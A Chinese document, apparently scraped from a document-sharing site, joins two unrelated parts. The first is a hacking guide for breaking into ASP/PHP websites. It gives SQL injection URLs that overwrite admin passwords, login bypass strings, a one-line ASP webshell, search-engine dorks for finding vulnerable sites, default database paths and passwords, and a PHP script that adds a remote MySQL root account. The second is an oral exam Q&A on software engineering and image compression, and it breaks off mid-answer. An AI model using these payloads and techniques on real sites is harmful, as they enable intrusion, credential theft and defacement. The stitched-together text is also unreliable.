有时上传不一定会成功,这是因为Cookies不一样.我们就要用WSockExpert取得Cookies.再用DOMAIN上传。还有一些只是检测文件类型的,没有进行后缀名判断,这样的上传只需要把木马文件的开关加个GIF89a就可以通过了。而且可以上传任意文件,在asp和asp.net测试中都可以上传。 2.注入漏洞

pS:对MD5密码.有时我们不是哪么容易跑出来.如果是[SQL数据库].那么我们可以用以下命令:

http://注入网址;update admin set password=’新MD5密码’ where password=’旧MD5密码’-- [admin为表名.] //看看是什么权限的,如果权限高的话,直接用SQLTOOLS进行连接就可以执行系统命令了。 http://注入网址 and 1=(Select IS_MEMBER(''db_owner''))

http://注入网址 And char(124)+Cast(IS_MEMBER(''db_owner'') as varchar(1))+char(124)=1 ;-- //检测是否有读取某数据库的权限

http://注入网址 and 1= (Select HAS_DBACCESS(''master''))

http://注入网址 And char(124)+Cast(HAS_DBACCESS(''master'') as varchar(1))+char(124)=1 -- 3.旁注,也就是跨站

我们入侵某站时可能这个站坚固的无懈可击,我们可以找下和这个站同一服务器的站点,然后在利用这个站点用提权,嗅探等方法来入侵我们要入侵的站点。在这里有个难点,就是一些服务器的绝对路径经过加密,这就看我们的本事了。 4.暴库:把二级目录中间的/换成\

eg:http://www.xxx.com/myhome/otherweb ... s.asp?BigClassName=职责范围&BigClassType=1

换成这样的形式提交:http://www.xxx.com/myhome\otherweb ... s.asp?BigClassName=职责范围&BigClassType=1

如果你能看到:’E:/ahttc040901/otherweb/dz/database/iXuEr_Studio.asa’不是一个有效的路径。 确定路径名称拼写是否正确,以及是否连接到文件存放的服务器。 这样的就是数据库了。下载时用FLASHGET换成.MDB格式的就行. 5.绕过密码验证直接进入后台

’or’=’or’这是一个可以连接SQL的语名句.可以直接进入后台。我收集了一下。类似的还有:

’or’’=’ \’) or (’a’=’a \’a’=’a

6.社会工程学

这个我们都知道吧。就是猜解。猜解一些人们常用的密码,比如他的生日啊,手机号码啊。办公电话啊等等。。

EY:http://www.xxx.cn/waishi/admin admin waishi

7.写入ASP格式数据库

加油!-----老菜鸟队

就是一句话木马[〈%execute request(\〉 ],常用在留言本. EY:http://www.xxx.cn/ebook/db/ebook.asp[这个就是ASP格式的数据库],再写入一句话木马,然后利用ASP后缀名的数据库进行写入木马。也提醒一下站长,MDB数据库改为.asp后缀也是不安全的。 8.源码利用

很多网站用的都是网上下载的源码,有的站长很懒,什么也不改。然后就上传开通网站了,像这样的网站只要知道他用的什么网站的源码做的,自己去网上下载一个,然后就有很多信息可以利用了。像数据库备份,网站后台啊,原始数据库路径啊,上传文件的路径啊等等,都可以进行利用。

EY:http://www.xxxx.edu.cn/xiaoyoulu/index.asp 这个站用的是:杰出校友录,源码我下过了,

默认数据库/webshell路径:/database/liangu_data.mdb 后台管理:adm_login.asp 密码及用户名都是admin

9.默认数据库/webshell路径利用

这样的网站很多/利人别人的WEBSHELL. /Databackup/dvbbs7.MDB /bbs/Databackup/dvbbs7.MDB /bbs/Data/dvbbs7.MDB /data/dvbbs7.mdb /bbs/diy.asp /diy.asp /bbs/cmd.asp /bbs/cmd.exe /bbs/s-u.exe /bbs/servu.exe

工具:网站猎手 挖掘鸡

EY:http://www.xxx.com/bbs/Databackup/dvbbs7.MDB

10.查看目录法,有一些网站可以浏览目录,可以看到目录下所有的文件。 EY:http://www.xxx.com/shop/admin/

http://www.xxx.com/babyfox/admin/#bb#dedsed2s/ 这样我们可以找到数据库,下载不用我教吧 11.工具溢出

.asp?NewsID= /2j.asp?id=18 .asp?id=[这种方法可以取得大量的WEBSHELL] 12.搜索引擎利用

(1).inurl:flasher_list.asp 默认数据库:database/flash.mdb 后台/manager/ (2).找网站的管理后台地址: site:xxxx.comintext:管理

site:xxxx.comintitle:管理 〈关键字很多,自已找〉 site:xxxx.cominurl:login

(3).查找access的数据库,mssql、mysql的连接文件 allinurl:bbsdata

filetype:mdbinurl:database filetype:incconn

inurl:datafiletype:mdb

加油!-----老菜鸟队

13.COOKIE诈骗

把自己的ID修改成管理员的,MD5密码也修改成他的,用桂林老兵工具可以修改COOKIE。然后就直接登录有了网站后台管理员权限了。这个我就不多讲了 14.利用常见的漏洞,如动网BBS

EY:http://www.xxx.com/bbs/index.asp

可以先用:dvbbs权限提升工具,使自已成为前台管理员。

THEN,运用:动网固顶贴工具,找个固顶贴,再取得COOKIES,这个要你自已做。我们可以用WSockExpert取得Cookies/NC包

3拿到webshell权限的45种方法

1, 到GoogLe,搜索一些关键字,edit.asp? 韩国肉鸡为多,多数为MSSQL数据库! 2, 到Google ,site:cq.cn inurl:asp 3, 利用挖掘鸡和一个ASP木马. 文件名是login.asp 路径组是/manage/ 关键词是went.asp 用'or'='or'来登陆 4,

关键字:Co Net MIB Ver 1.0网站后台管理系统 帐号密码为 'or'='or' 5. 动感购物系统

inurl:help.asp登陆,如未注册成为会员!

upLoad_bm1.asp和upLoad_c1.asp这两个随便选个,一般管理员都忽视了这2漏洞

6。 默认数据库地址blogdata/acblog.asa 关键字:acblog 7. 百度 /htdocs

注册里可以直接上传asa文件! 8. /Database/#newasp.mdb

关键词:NewAsp SiteManageSystem Version 9. 用挖掘机

关键字:Powered by WEBBOY 页面:/upfile.asp

10. baidu中搜索关键字Ver5.0 Build 0519 (存在上传漏洞)

11. Upfile_Article.asp bbs/upfile.asp 输入关键字:powered by mypower ,

12. inurl:winnt\\system32\\inetsrv\\ 在google里面输入这个就可以找到很多网站 13. 现在GOOGLE搜索关键字 intitle:网站小助手 inurl:asp

14. 键字: 首页 最新动态 新手指南 舞曲音乐 下载中心 经典文章 玩家风采 装备购买 站内流言 友情连接 本站论坛 挖掘鸡的关键字 添 setup.asp 15. VBulletin论坛的数据库

加油!-----老菜鸟队

默认数据库地址!

/includes/functions.php 工具:

1.网站猎手 下载地址:百度 Google! 2.Google 关键字:

Powered by: vBulletin Version 3.0.1 Powered by: vBulletin Version 3.0.2 Powered by: vBulletin Version 3.0.3 其中一个就可以了

16. 1.打开百度或GOOGLE搜索,输入powered by comersus ASP shopping cart open source。 这是一个商场系统。

2.网站的最底部分,有个 Comersus Open Technologies LC。打开看下~~comersus系统~ 猜到,comersus.mdb. 是数据库名 数据库都是放在database/ 后的, 所以database/comersus.mdb

comersus_listCategoriesTree.asp换成database/comersus.mdb,不能下载。 那样把前一个''store/''除去,再加上database/comersus.mdb 试试 17.

无忧传奇官方站点程序。

1、后台管理地址:http://您的域名/msmiradmin/ 2、默认后台管理帐号:msmir

3、默认后台管理密码:msmirmsmir

数据库文件为 http://您的域名/msmirdata/msmirArticle.mdb 数据库连接文件为 ***********/Conn.asp 18. 百度里输入/skins/default/ 19. 利用挖掘机

关键机:power by Discuz 路径:/wish.php 配合:

Discuz!论坛 wish.php远程包含漏洞 工具使用 20. 上传漏洞. 工具 : Domain3.5 网站猎手 1.5版

关键字powered by mypower

检测的页面或文件插入upfile_photo.asp 21. 新云漏洞

这个漏洞ACCESS和SQL版通吃。

Google搜索关键字 \关于本站 - 网站帮助 - 广告合作 - 下载声明 - 友情连接 - 网站地图 - 管理登录\

把flash/downfile.asp?url=uploadfile/../../conn.asp提交到网站根目录。就可以下载conn.asp

以源码,软件等下载站居多。

大家时常碰到数据库如果前面或者中间+了# 可以用#替换就可以下载了

加油!-----老菜鸟队

\\database\\#newasp.mdb

如:#xzws.mdb 改成#xzws.mdb 22. 通吃所有商城+动力上传系统 使用工具:挖掘鸡 v1.1 明小子 商城入侵:

关键字:选购->加入购物车->去收银台->确认收货人信息->选付款方式->选配送方式->在线支付或下单后汇款->汇款确认->发货->完成 漏洞页面:upload.asp upfile_flash.asp 动力入侵:

关键字:powered by mypower 漏洞页面:upfile_photo.asp Upfile_Soft.asp upfile_adpic.asp upfile_softpic.asp 23. 注射漏洞

百度搜索:oioj's blog 24 动易 列目录

admin_articlerecyclebin.asp

inurl:admin_articlerecyclebin.asp 25. 工具:网站猎手 关键词:inurl:Went.asp 后缀:manage/login.asp 口令:'or'='or' 26. 入侵魔兽私服

需要的工具:ASP木马一只。 Domain3.5明小子

关键字:All Right Reserved Design:游戏联盟 后台地址:admin/login.asp

数据库的地址:chngame/#chngame.mdb 27. 漏洞是利用管理员iis设臵的失误 用baidu 关键字就是比较罕见的脚本名 动网: ReloadForumCache.asp Leadbbs: makealltopanc.asp BBSXP: admin_fso.asp

动易: admin_articlerecyclebin.asp 28. 国外站的爆库漏洞

关键字:sad Raven's Guestbook 密码地址:/passwd.dat 后台地址:/admin.php

29. Discuz 4.1.0跨站漏洞 利用工具:1,WAP浏览器 2,WAP编码转换器

加油!-----老菜鸟队

|RWAMLCDP知道该用户具有:读取(R),写入(W),追加(A)等功能,唯独缺少了\执行(E)\功能!利用PUT命令上传一个一句话的 WebShell上去.在浏览器中运行http://www.*****.net/ a***lover/photo/gallery/webshell.php?cmd=dir,出现: Warning: passthru(): Unable to fork [dir] in D:\\s***n\\a***lover\\photo\\gallery\\webshell.php on line 1

看 来外部命令不能执行,管理员一定作了相应设臵.再上传一个phpinfo.php文件 在浏览器中运行:http://www.*****.net/ a***lover/photo/gallery/phpinfo.php,这时在php.ini变量的设臵都显示出来了(当然也你可以利用CASI看 c:\\windows\\php.ini 的内容)!外部命令不能执行的原因在此: 以下是引用片段: safe_mode Off Off

safe_mode_exec_dir no value no value

safe_mode_gid Off Off

safe_mode_include_dir no value no value

接下来上传一个自己编的仅带有浏览,拷贝,重命名,删除文件和上传文件五个功能的PHPSHELL:CMD.PHP

注: 由于时间仓促代码界面没优化好,在dir文本框中输入要浏览的目录名称;copy文本框中,上面输入源文件如d:\\web\\cmd.php,下面输入目标 文件如d:\\web\\cmdbak.php;del文本框中输入要删除的文件名如:d:\\web\\cmdbak.php;ren命令与copy命令相似; 点浏览按钮,选择你要上传的文件,然后点upload按钮,就上传到与本SHELL相同的目录下了. 运行: http://www.*****.net/ a***lover/photo/gallery/cmd.php,利用dir命令,可以看D盘,C:\\windows,以及C:\\Program Files下的内容,而且对D盘还有写权限!在通过copy命令把想下载的软件考到WEB目录下下载下来了^_^

如何才能把文件写到只读的C盘上呢?这就要通过MYSQL了!但是MYSQL没有远程连接啊!没有条件创造条件,看文章系统的配臵文件config.inc.php的内容了吗? $dbhost=\数据库主机名 $dbuser=\数据库用户名 $dbpass=\数据库密码 $dbname=\数据库名 数据库用户名和密码都知道了,可惜的是本地用户,然而我们能不能通过本地有最高权限用户root来添加个远程用户呢?答案是肯定的。

为此专门写了个程序adduser.php利用已知的有ROOT权限的帐号添写加远程ROOT权限的帐号,内容如下: 以下是代码片段:

$dbh=mysql_connect('localhost:3306','root','*****');// echo mysql_errno().\

加油!-----老菜鸟队

mysql_select_db('mysql');

echo mysql_errno().\\

$query=%username@'%'IDENTIFIED BY 'password' WITH GRANT OPTION\

$res=mysql_query($query, $dbh);

echo mysql_errno().\\

$err=mysql_error(); if($err){

echo \!\} else{

echo \!\}

《网络攻防技术实践》考核口试题

?

软件工程相关

1. 软件的算法是如何定义的?有哪些主要特征?

算法是指解题方案的准确而完整的描述,是一系列解决问题的清晰指令。 七个主要特征:有穷性、确定性、可行性、有效性、健壮性、输入项输出项 2. 软件中算法的效率如何度量?

空间复杂度、时间复杂度。 3. 解释一下算法、程序和软件的概念。

算法:通常指可以用来解决的某一类问题的步骤或程序,这些步骤或程序必须是明确的和有效的,而且能够在有限步之内完成的。

程序:程序(program)是为实现特定目标或解决特定问题而用计算机语言编写的命令序列的集合。

软件:计算机系统中与硬件相互依存的一部分,包括程序、数据、相关文档的完整集合。 4. 什么是结构化程序设计?有哪几种主要结构?

结构化程序设计(structured programming)是进行以模块功能和处理过程设计为主的详细设计的基本原则。它的主要观点是采用自顶向下、逐步求精的程序设计方法,使用三种基本控制结构构造程序。任何程序都可由顺序、选择、循环三种基本控制结构构造 。 5. 解释一下C语言中结构体的概念?

结构体是由一系列具有相同类型或不同类型的数据构成的数据集合。 6. 什么是数据结构?数据结构在计算机中如何表示?

数据结构是计算机存储、组织数据的方式。数据结构是指相互之间存在一种或多

加油!-----老菜鸟队

种特定关系的数据元素的集合。常用的数据结构有数组、栈、队列、链表、树、图、堆和散列表等。数据结构在计算机中的表示成为数据的物理结构,又称为存储结构,包括数据元素的表示和关系的表示。表示方法有结点、顺序存储结构和链式存储结构。 7. 解释一下数据结构中线性表的概念?

线性表中数据元素之间的关系是一对一的关系,即除了第一个和最后一个数据元素之外,其它数据元素都是首尾相接的。 8. 解释一下数据结构中树的概念?

树是由一个集合以及在该集合上定义的一种关系构成的。集合中的元素称为树的结点,所定义的关系称为父子关系。父子关系在树的结点之间建立了一个层次结构,这个结点称为该树的根结点。

树的递归定义:

树(Tree)是n(n≥0)个结点的有限集T,T为空时称为空树,否则它满足如下两个条件: (1)有且仅有一个特定的称为根(Root)的结点;一个根节点

(2)其余的结点可分为m(m≥0)个互不相交的子集Tl,T2,…,Tm,其中每个子集本身又是一棵树,并称其为根的子树(Subree)。 9. 解释一下数据结构中队列的概念?

队列是一种特殊的线性表,它只允许在表的前端(front)进行删除操作,而在表的后端(rear)进行插入操作。 10. 为什么要实施软件工程?

?软件的快速发展:需求越来越高、规模越来越大、种类越来越多、结构越来越复杂; 软件危机的存在:软件的特点及传统开发方法使软件危机四伏 11. 软件工程的基本内容是什么?

软件工程研究如何以系统性的、规范化的、可定量的过程化方法去开发和维护软件,如何把正确的管理技术和当前最好的技术方法结合起来。

主要内容:软件开发技术、软件工程管理。 12. 有哪几种主要的软件开发模型?

瀑布模型、快速原型模型、增量模型、螺旋模型、喷泉模型。 13. 软件有哪些主要特点?

(1)软件具有抽象性;(2)软件不是制造出来的;(3)软件没有磨损和老化,有生命周期;(4)对计算机系统有依赖性; 14. 软件是如何分类的?

一般来讲软件被划分为系统软件、应用软件,管理软件、行业软件、安全防护软件、多媒体软件、游戏软件

(1)按软件功能划分:系统软件、支撑软件、应用软件

加油!-----老菜鸟队

(2)按软件规模进行划分:微型、小型、中型、大型、甚大型、极大型、 (3) 按工作方式划分:实时处理软件、分时软件、交互式软件、批处理软件 (4) 按软件服务对象的范围划分:项目软件、产品软件 (5) 按使用的频度进行划分:一次使用、频繁使用

(6) 按软件失效的影响进行划分:高可靠性软件、一般可靠性软件 15. 什么是软件危机?其主要表现有哪些?

落后的软件生产方式无法满足迅速增长的计算机软件需求,从而导致软件开发与维护过程中出现一系列严重问题的现象。

表现:1软件开发成本进度失控;2用户不满意;3软件产品的质量靠不住;4缺乏文档资料;5软件不可维护; 6软件成本占计算机系统总成本的比例上升;7软件开发生产率的提高跟不上计算机普及深入的趋势。 16. 什么是软件工程?

软件工程是研究如何以系统性的、规范化的、可定量的过程化方法去开发和维护软件,如何把正确的管理技术和当前最好的技术方法结合起来。 17. 什么是软件工程的三要素?

方法、工具和过程

18. 软件工程的知识结构包括哪些主要内容?

软件需求、软件设计、软件构造、软件测试、软件维护、软件配臵管理、软件工程管理、软件工程过程、软件工程工具和方法、软件质量 19. 什么是软件工程中的配臵管理?

配臵管理(Configuration Management,CM)是通过技术或行政手段对软件产品及其开发过程和生命周期进行控制、规范的一系列措施。配臵管理的目标是记录软件产品的演化过程,确保软件开发者在软件生命周期中各个阶段都能得到精确的产品配臵。 20. 软件工程中文档的作用是什么?

1)阶段工作成果和结束标志;2)向管理人员提供软件开发过程中的进展和情况;3)记录开发过程中的技术信息,便于协调以后的软件开发、使用和修改;4)便于各类人员之间相互了解彼此的工作;5)向潜在用户报告软件的功能和性能。 21. 软件工程的基本原则有哪些?

1选取适宜开发范型;2采用合适的设计方法;3提供高质量的工程支持;4重视开发过程的管理.

22. 如何选择软件过程模型?

1)模型应符合软件本身的性质(规模、复杂性) 2)模型应满足软件应用系统整体开发进度要求 3)模型应有可能控制并消除软件开发风险

加油!-----老菜鸟队

4)模型应有可用的计算机辅助工具(如快速原型工具)的支持 5)模型应与用户和软件开发人员的知识和技能相匹配 6)模型应有利于软件开发的管理与控制 23. 什么是软件设计?

应用各种技术和原理,详细定义一个设备、程序或系统的物理实现的过程。 24. 软件设计的目标和目的是什么?

1付出较低的开发成本、2达到要求的软件功能、3取得较好的软件性能、4开发的软件易于移植、5需要较低的维护费用、6能按时完成开发工作,7及时交付使用 25. 软件设计的任务是什么?

数据设计:将分析时创建的信息域模型变换为实现软件所需的数据结构 结构设计:定义软件系统各主要部件之间的关系

接口设计:描述软件内部、软件和协作系统之间以及软件与人之间如何通信 过程设计:把系统结构部件转换成软件单元的过程性描述 26. 软件设计的过程包括哪些主要内容?

软件的设计是一个将需求转变为软件陈述(表达)的过程。通过逐步求精使得设计陈述逐渐接近源代码。这里有两个基本步骤;第一步是初步设计,将需求转换成数据和软件框架。第二步是详细设计,将框架逐步求精细化为具体的数据结构和软件的算法表达。 27. 良好的软件设计的特征有哪些?

设计必须实现所有包含在分析模型中的明示需求,并且必须满足客户希望的所有潜在需求;设计对于软件的编码、测试、维护人员必须是可读的、可理解的;设计应该提供软件的完整面貌,包括从实现角度所见的数据、功能、流程。 28. 软件设计的原则有哪些?

1设计对于分析模型应该是可跟踪的;2设计结构应该尽可能的模拟实际问题;3设计应该表现出一致性;4不要把设计当成编写代码;5在创建设计时就应该能够评估质量;6评审设计以减少语义性的错误;7设计应该模块化。 29. 什么是软件设计中的内聚?主要有哪些类型?

内聚指的是一个模块内部各组成部分的处理动作的组合强度,又称块内联系。 偶然内聚、逻辑内聚、时间内聚、过程内聚、通讯内聚、顺序内聚、功能内聚。 30. 什么是软件设计中的耦合?主要哪些等级?

耦合(coupling)指的是两个模块之间的相互依赖关系,又称块间联系。 非直接耦合、数据耦合、特征耦合、控制耦合、外部耦合、公共耦合、内容耦合。 31. 什么是软件设计中的数据设计?有主要原则有哪些?

将模型转换成数据结构的定义。选择需求定义、规格说明中提出的数据对象的逻辑表示。

加油!-----老菜鸟队

原则:(1)用于功能和行为的系统分析原则也应用于数据

(2)应该标识所有的数据结构以及其上的操作 (3)应当建立数据字典,并用于数据设计和程序设计 (4)低层的设计决策应该推迟到设计过程的后期

(5)只有那些需要直接使用数据结构内部数据的模块才能看到该数据的表示 (6)应该开发一个由有用的数据结构和应用于其上的操作组成的库 (7)软件设计和程序设计语言应该支持抽象数据类型的规格说明和实现。 32. 什么是软件设计中的结构设计?

开发一个模块化的程序结构,表示出模块之间的控制关系,将程序设计和数据结构相结合,为数据在程序中的流动定义接口。 33. 什么是软件设计中的可靠性设计和安全设计?

可靠性设计:应根据系统的可靠性要求,按照可靠性设计准则开展设计工作,并在必要时,进行容错、避错等专门的可靠性设计工作。要特别注意对软件出错处理的设计工作,不仅要设计对硬件等软件外系统出错时的处理,而且还要在假定最终软件产品必定还会有错的情况下,进行软件出错的处理设计。

安全设计:在体系结构设计中应充分考虑系统对软件的安全性需求,进行安全性分析,确定安全性关键的软件部件,采取相应的安全性设计措施。 34. 如何选择编程语言?

应用领域、算法及运算的复杂性、软件运行的环境、性能、数据结构的复杂性、软件开发组成员对该语言的熟悉程度 35. 什么是源程序文档化?

选择好标识符的名字,安排必要的注解,使得程序的结构一目了然,便于他人阅读,这样的过程叫做源程序文档化。

36. 什么是程序中的注释?包括哪几种主要类型?

注释就是对代码的解释和说明。目的是为了让别人和自己很容易看懂。夹在程序中的注释是程序员与日后的程序读者之间通信的重要手段。

序言性注释和功能性注释 37. 如何理解程序的效率?

程序的效率是指程序的执行速度及程序所需占用的内存的存储空间。 38. 程序的复杂性如何度量?

一个程序的复杂性的高低体现在运行该程序所需要的计算机资源的多少上面,所需的资源越多,我们就说该程序的复杂性越高;反之,则该算法的复杂性越低。

度量方法有代码行度量法、McCabe度量法、Halstead度量法。 39. 什么是软件中的调试?有哪些调试策略?

加油!-----老菜鸟队

编好程序后,用各种手段进行查错和排错的过程。作为程序的正确性不仅仅表现在正常功能的完成上,更重要的是对意外情况的正确处理。调试策略:

调试策略:试探法、回溯法、对分查找法、归纳法、演绎法 40. 软件调试过程中修改错误的原则有哪些?

1、在出现错误的地方很可能还有别的错误

2、修改错误的一个常见失误是只修改了这个错误的征兆或这个错误的表现,而没有修改错误的本身

3、当心修正一个错误的同时有可能会引入新的错误 4、修改错误的过程将迫使人们暂时回到程序设计阶段 5、修改源代码程序,不要改变目标代码 41. 软件测试的目的是什么?

从用户的角度出发,普遍希望通过软件测试暴露软件中隐藏的错误和缺陷,以考虑是否可接受该产品。从软件开发者的角度出发,则希望测试成为表明软件产品中不存在错误的过程,验证该软件已正确地实现了用户的要求,确立人们对软件质量的信心 42. 软件测试的原则是什么?

1. 应当把“尽早地和不断地进行软件测试”作为软件开发者的座右铭。 2. 测试用例应由测试输入数据和对应的预期输出结果这两部分组成。 3. 程序员应避免检查自己的程序。

4. 在设计测试用例时,应当包括合理的输入条件和不合理的输入条件。

5. 充分注意测试中的群集现象。经验表明,测试后程序中残存的错误数目与该程序中已发现的错误数目成正比。

6. 按计划测试,排除测试的随意性。 7. 应当对每一个测试结果做全面检查。

8. 妥善保存测试计划,测试用例,出错统计和最终分析报告,为维护提供方便。 43. 软件测试的对象是什么?测试完成的准则是什么?

需求分析、概要设计、详细设计以及程序编码等各阶段所得到的文档,包括需求规格说明、概要设计规格说明、详细设计规格说明以及源程序,都应成为软件测试的对象。 完成准则:1资源耗尽

2采用的测试方法满足某种测试充分性要求 3满足覆盖率等可度量的测试要求

4一段时期没有发现问题且所有发现问题均已解决 5通过测试评估出软件达到要求的可靠度

6测试发现频率和趋势达到预先计划的限度之下(限度根据要求、经验和历史数据得到)

加油!-----老菜鸟队

7在一段时期没有出现等级高的问题

44. 主要有哪些类型的测试活动?

单元测试、集成测试、合格性测试、系统测试、功能测试、强度测试、安全性测试、可靠性测试、恢复性测试、第三方测试 45. 什么是软件测试中的单元测试?

单元测试是验证单元满足功能、性能和接口等的要求 46. 什么是软件测试中的集成测试?

依据软件设计确定的软件结构,按照软件集成“工序”,把各个软件单元逐步集成为完整的软件系统,并不断发现和排除错误,以保证联接、集成的正确性 47. 什么是软件测试中的合格性测试?

根据软件需求规格说明中定义的全部功能、性能、可靠性等需求,测试整个软件是否达到要求。

48. 什么是软件测试中的系统测试?

软件与与系统中其它的软、硬件对接并测试其接口的过程 49. 什么是软件测试中的功能测试?

功能测试是在规定的一段时间内运行软件系统的所有功能,以验证这个软件系统有无严重错误

50. 什么是软件测试中的强度测试?

强度测试是要检查在系统运行环境不正常乃至发生故障的情况下,系统可以运行到何种程度的测试

51. 什么是软件测试中的可靠性测试?

软件可靠性测试是以能获得可用来评估软件可靠性的数据为目的的一种软件测试。 52. 什么是软件测试中的安全测试?

针对程序中危险防止和危险处理设施进行的测试,以验证其是否有效。 53. 什么是软件测试中的恢复性测试?

恢复测试是要证实在克服硬件故障(包括掉电、硬件或网络出错等)后,系统能否正常地继续进行工作,并不对系统造成任何损害。 54. 什么是软件测试中的Alpha测试和Beta测试?

Alpha测试:由一个用户在开发者的场所、在开发者指导下进行测试 Beta测试:由最终用户在一个或多个用户场所单独地进行测试 55. 什么是软件测试中的独立(第三方)测试?

第三方指的是与软件项目甲方、乙方相对独立的其它机构。

进行独立测试的目的是进一步加强软件质量保证工作,提高软件的质量,并对软件产品进行客观评价。进行第三方独立测试通常有以下优点:

加油!-----老菜鸟队

1)发挥专业技术优势;2)发挥独立性优势;3)进一步促进承办方的工作。 56. 软件测试的方法主要有哪些?

静态测试 动态测试

57. 什么是软件测试方法中的静态测试?

静态分析、代码审查、代码走查、桌面检查、技术评审 58. 什么是软件测试方法中的动态测试?

白盒测试、黑盒测试

59. 什么是软件测试方法中的黑盒测试?

是把测试对象看做一个黑盒子,测试人员完全不考虑程序内部的逻辑结构和内部特性,只依据程序的需求规格说明书,检查程序的功能是否符合它的功能说明。 60. 什么是软件测试方法中的白盒测试?

把测试对象看做一个透明的盒子,它允许测试人员利用程序内部的逻辑结构及有关信息,设计或选择测试用例,对程序所有逻辑路径进行测试。通过在不同点检查程序的状态,确定实际的状态是否与预期的状态一致。 61. 什么是软件黑盒测试的等价类?

等价类划分是一种典型的黑盒测试方法,使用这一方法时,完全不考虑程序的内部结构,只依据程序的规格说明来设计测试用例。

使用这一方法设计测试用例要经历划分等价类和选取测试用例两步。

1、划分等价类,等价类是指某个输入域的子集合,在该集合中,各个输入数据对于揭露程序中的错误都是等价的。

2、在每一个等价类中取一个数据作为测试的输入条件,这样就可以少量的代表性测试数据,来取得较好的测试结果

62. 什么是软件黑盒测试有效等价类和无效等价类?

①有效等价类:是指对于程序的规格说明来说,是合理的,有意义的输入数据构成的集合。 ②无效等价类:是指对于程序的规格说明来说,是不合理的,无意义的输入数据构成的集合。 63. 软件维护的概念是什么?

在软件运行/维护阶段对软件产品进行的修改就是所谓的维护。 64. 软件维护的类型有哪几种?其基本概念是什么?

维护的类型有三种: 改正性维护、适应性维护、完善性维护

改正性维护:为了识别和纠正软件错误、改正软件性能上的缺陷、排除实施中的误使用,应当进行的诊断和改正错误的过程就叫做改正性维护。

适应性维护:为使软件适应使用过程中外部环境和数据环境的变化,而去修改软件的过程就叫做适应性维护。

完善性维护:在软件的使用过程中,。为了满足用户对软件提出新的功能要求,需要修

加油!-----老菜鸟队

改或再开发软件叫做完善性维护。 65. 软件用户界面应具备哪些特性?

可使用性、灵活性、复杂性、可靠性、 66. 软件用户类型如何划分?

外行型、初学型、熟练型、专家型 67. 解释说明UML的概念和作用?

统一建模语言(UML)是用来对软件密集系统进行描述、构造、视化和文档编制的一种语言。

统一了面向对象建模的基本概念、属于及图形符号,为人们建立了便于交流的共同语言。 68. 举例说明UML中的时序图、类图的概念和价值?

时序图(Sequence Diagram)用来显示对象之间的关系,并强调对象之间消息的时间顺序,同时显示了对象之间的交互。它通过描述对象之间发送消息的时间顺序显示多个对象之间的动态协作。它可以表示用例的行为顺序,当执行一个用例行为时,时序图中的每条消息对应了一个类操作或状态机中引起转换的触发事件。

时序图中包括如下元素:类角色,生命线,激活期、消息

类图表示不同的实体(人、事物和数据)如何彼此相关;换句话说,它显示了系统的静态结构。该图描述了系统的类别集合,类别的属性和类别之间的关系。 69. 总结和分析如何进行高质量的C++编程?

自己编吧

70. 软件质量如何度量?

1. 可理解性;2. 可靠性;3. 可测试性;4. 可修改性;5. 可移植性;6. 效率;7. 可使用性

?

媒体处理相关

71. 数据压缩的基本分类?

无损压缩,有损压缩

72. 衡量数据压缩质量的主要指标是什么?

(1)压缩比;(2)压缩质量(失真);(3)压缩与解压缩的速度。 73. 图像的主要压缩编码格式有哪些?

jpeg、jpeg2000、bmp、gif、psd、png、jpg、jpe 74. JPEG图像压缩的基本原理?

JPEG压缩过程:1.颜色模式转换及采样;2.DCT变换;3.量化;4.编码(Huffman编码)。 75. JPEG2000图像压缩的基本原理?

JPEG 2000与传统JPEG最大的不同,在于它放弃了JPEG 所采用DTC(离散馀弦转换)为主的区块编码方式,而改采以小波转换为主的多解析编码方式。小波转换的主要目的是要将

本文来源:https://www.bwwdw.com/article/onhg.html

Top